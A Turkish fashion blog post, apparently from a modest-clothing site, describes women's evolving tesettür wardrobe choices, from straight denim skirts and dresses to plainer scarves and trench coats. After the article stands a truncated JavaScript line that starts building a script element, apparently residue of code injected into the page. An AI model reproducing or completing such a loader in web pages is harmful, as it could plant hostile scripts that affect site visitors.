Tesettür Giyimde Yükseliş

Önceki yazımızda tesettürle yeni tanışan bayanlarımızın seçimlerinden bahsetmiştik. Şimdiki yazımız ise tesettürle tanışmasının üzerinden belli bir zaman geçmiş ve tesettürü yavaş yavaş yaşam tarzına da aktarmaya başlayan bayanların seçimlerinden bahsedeceğiz.

Tesettürlü olmanın farkına varmaya başlayan bayanlarımız gittikçe daha tesettüre dönük kıyafetler seçme eğilimi göstermeye başlarlar. Yani önceden pantolon giymeyi tercih eden bayanların birkaç sene sonra düz kesim kot etekler, etek pantolonlar, elbiseler giymeye başladığını görebiliriz. Genç bayanlar daha çok düz kesim eteklerde kot kumaştan ve ya diğer kumaş türlerinden siyah, mavi, yeşil ve bordo renk tonlarından oluşan seçimler görebilmekteyiz. Yaz aylarında ise tüllerden oluşan ve ya rahat kesimli kumaşlarla tasarlanmış etek modelleri tesettürde yükseliş devrinin etkilerini gösteriyor.

Eteklerin üzerine kış aylarında kazaklar en çok tercih edilen türlerden olurken, kot eteklerin üzerine uzun kollu gömlekler ve ya badi bluzlar daha çok kullanılıyor. Yaz aylarında yarım kollu t-shirtlerin üzerine ince örgüden ve ya trençkottan ceketlerde en son trendlerden.

Şallarda ve eşarplarda ise ilk tesettür döneminde renk renk modeller seçilirken birkaç sene sonra daha sade ve tek renk modellere yönelik tasarımlar seçilmeye başlanıyor. Tesettürde yükseliş dönemi yavaş yavaş tesettürü içselleştirerek bütün kıyafetlerde tesettür anlayışına yönelik tasarımlar seçilmeye başlanıyor.

Diz kapaklarına kadar gelen trençkotlar, kaplar, pardösüler ve ceketler bu dönemde en sevilen modellerin başında gelirken, elbiselerin büyüsü de bu dönemde başlıyor. Sade ve yerlere kadar uzanan elbiselerin yanında daha klasik ayakkabılar ve değişik modellerde babetler de tesettür şıklığına ekleniyor.

Tesettür anlayışının zihinlerde ve yaşam tarzında asıl anlamını bulmaya başladığı bu dönemde tam olmasa da tesettür kavramının içini doldurmaya başlayan bayanlar, fıtrata işlenmiş olan kapanma duygusunu hissetmeye başlıyorlar. Sizde aynı duyguları paylaşıyorsanız tesettürde yükseliş devrine hoşgeldiniz…

var d=document;var s=d.createElement(‘script’);

3549 Toplam 2 Bugün
Yazar: Bilge

Sizler için tesettür hayatına ve giyimine çok özel ürünler sunmaya çalışan editör olarak bayanlarımızın isteklerine ışık tutmaya çalışacağım. İnşallah bu güzel siteyi beğenir ve yorumlarınızla bizlere mutluluk verirsiniz. Sevgiler ve saygılar...

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Şu HTML etiketlerini ve özelliklerini kullanabilirsiniz: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>